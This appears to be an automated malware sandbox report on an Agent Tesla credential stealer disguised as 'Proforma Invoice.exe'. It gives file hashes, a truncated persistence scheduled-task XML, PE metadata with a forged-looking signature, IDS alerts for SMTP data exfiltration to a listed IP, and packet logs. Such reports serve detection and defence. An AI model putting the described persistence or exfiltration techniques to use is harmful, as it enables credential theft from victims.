                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1575
                                                                                                Entropy (8bit):5.115544302810953
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta0xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                                                MD5:FD0560D8582557F958EB4392541DD9EA
                                                                                                SHA1:69A1AC40194171B47F55362E4D1D9B6AD38E1268
                                                                                                SHA-256:C75D1F9E985B3BC08132C78B895C74C4A4E1A94082C3157226345AF30B858149
                                                                                                SHA-512:A327F4EE084C4C0BAA65353AB2D08466DC8ADDFC9FE865EED215E66B3122E57A48590C3B3557704A4F544F41880CFE7420709D30B1551670475AB3ECB57F4B97
                                                                                                Malicious:true
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                Process:C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1575
                                                                                                Entropy (8bit):5.115544302810953
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta0xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                                                MD5:FD0560D8582557F958EB4392541DD9EA
                                                                                                SHA1:69A1AC40194171B47F55362E4D1D9B6AD38E1268
                                                                                                SHA-256:C75D1F9E985B3BC08132C78B895C74C4A4E1A94082C3157226345AF30B858149
                                                                                                SHA-512:A327F4EE084C4C0BAA65353AB2D08466DC8ADDFC9FE865EED215E66B3122E57A48590C3B3557704A4F544F41880CFE7420709D30B1551670475AB3ECB57F4B97
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):737288
                                                                                                Entropy (8bit):7.964743026999287
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:1lW33mzBh35KR3kWhUlZ/WYjJsRVFYF/Iu65Ho3ZFQYATaFX21Q9NtS8zVjBwCkR:rBwRbqZ/H1sRbW/Iu6FoJFJATAX21Q9A
                                                                                                MD5:B774CA62D4F7E4A8359A40C7CAD50DDB
                                                                                                SHA1:09467EA941B0C2C65CF908419847A7B3F948CC44
                                                                                                SHA-256:B9008D07600AF358E885FE396B52BBC6EFBC135F7010E6AA6849C3AF952DD9FB
                                                                                                SHA-512:73E6C2C67CDBA72866316DDD6010F9A289AB75DAC8F3228A749EC1595D94C18E10B8890F77978004341A762874845DDF7B1785F388CC956B38A99EAABAB5A2A7
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..e..............0......$......r.... ... ....@.. ....................................@................................. ...O.... ..X ...............6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...X ... ..."..................@..@.reloc.......`......................@..B................T.......H.......pb..@T......Y.......pK..........................................V.(.....(....X.(....X**#......Y@**#.....p.@*..s....}.....s(...}.....s....}.....(.....(.....{.....{....o....*.0..x.......r...pr...pr...ps#......{....o....o......{....o....o......{....o....o......{....o....o....o.....{.....o....&.{.....o....*F.{....r'..po ...*F.{....r'..po ...*.0...........{....(!....r)..p.("...*.0..R.......r)..p(#...(...+o%....+!..(&.....{.....o.....{.....o....&..('...-...........o(....*..
                                                                                                Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.964743026999287
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                File name:Proforma Invoice.exe
                                                                                                File size:737'288 bytes
                                                                                                MD5:b774ca62d4f7e4a8359a40c7cad50ddb
                                                                                                SHA1:09467ea941b0c2c65cf908419847a7b3f948cc44
                                                                                                SHA256:b9008d07600af358e885fe396b52bbc6efbc135f7010e6aa6849c3af952dd9fb
                                                                                                SHA512:73e6c2c67cdba72866316ddd6010f9a289ab75dac8f3228a749ec1595d94c18e10b8890f77978004341a762874845ddf7b1785f388cc956b38a99eaabab5a2a7
                                                                                                SSDEEP:12288:1lW33mzBh35KR3kWhUlZ/WYjJsRVFYF/Iu65Ho3ZFQYATaFX21Q9NtS8zVjBwCkR:rBwRbqZ/H1sRbW/Iu6FoJFJATAX21Q9A
                                                                                                TLSH:14F4234C7F748A93CD7B8BB52064525287F262C53829F6E8ACC571DED2E6F48A712D03
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..e..............0......$......r.... ... ....@.. ....................................@................................
                                                                                                Icon Hash:0f2952b2b2562b8e
                                                                                                Entrypoint:0x4b0272
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x65D7F750 [Fri Feb 23 01:39:28 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                Subject Chain
                                                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                Version:3
                                                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                xor al, 47h
                                                                                                xor al, 51h
                                                                                                aaa
                                                                                                cmp byte ptr [ecx+49h], al
                                                                                                inc edi
                                                                                                xor al, 50h
                                                                                                xor bl, byte ptr [ecx+34h]
                                                                                                aaa
                                                                                                cmp byte ptr [32383847h], dh
                                                                                                xor eax, 00000000h
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb02200x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x2058.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xb0a000x3608
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000xae2900xae400b2bb2f3424444c3aa648e7ac14114484False0.9631133989418939data7.971460179462412IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xb20000x20580x22008a161d22b3f5ecfbe9abd64fad2b5bbaFalse0.8448988970588235data7.374338760112415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xb60000xc0x200bd3d4dc1b342fb7433140a3fccba8cd4False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xb21000x1a27PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9796863330843913
                                                                                                RT_GROUP_ICON0xb3b380x14data1.05
                                                                                                RT_VERSION0xb3b5c0x2fcdata0.45418848167539266
                                                                                                RT_MANIFEST0xb3e680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain
                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                02/27/24-08:27:06.420135TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49739587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:03.102734TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49736587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:03.102734TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49736587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:03.102734TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249736587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:06.420135TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49739587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:06.420135TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49739587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:06.420135TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249739587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:06.420071TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49739587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:03.102734TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49736587192.168.2.450.87.139.143
                                                                                                02/27/24-08:27:03.102734TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49736587192.168.2.450.87.139.143
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 27, 2024 08:26:57.856971979 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:57.857031107 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:57.857104063 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:57.869065046 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:57.869105101 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.137742043 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.137830019 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:58.141211987 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:58.141233921 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.141761065 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.195111036 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:58.284296036 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:58.329909086 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.424669981 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.424906969 CET44349734172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:26:58.425189018 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:58.431250095 CET49734443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:26:59.682511091 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:26:59.865139961 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:26:59.865238905 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:01.847554922 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:01.847775936 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:02.031174898 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.032288074 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:02.053471088 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.053524971 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.053617001 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.061269045 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.061296940 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.215349913 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.215950966 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:02.321228981 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.321636915 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.323220015 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.323229074 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.323941946 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.398310900 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.430123091 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.438625097 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.473907948 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.512758017 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.513128042 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:02.616300106 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.616647005 CET44349738172.67.74.152192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.616955996 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.622531891 CET49738443192.168.2.4172.67.74.152
                                                                                                Feb 27, 2024 08:27:02.695749044 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.695775986 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.696296930 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:02.918858051 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:02.919197083 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.101927996 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:03.102018118 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:03.102734089 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.102734089 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.102803946 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.102803946 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.147762060 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.285402060 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:03.287079096 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:03.329740047 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:03.330010891 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:03.336184025 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:05.277101994 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:05.277499914 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:05.460086107 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:05.460613966 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:05.643049955 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:05.643462896 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:05.831377983 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:05.834887028 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.016946077 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:06.017261982 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.236444950 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:06.236768961 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.418874979 CET5874973950.87.139.143192.168.2.4
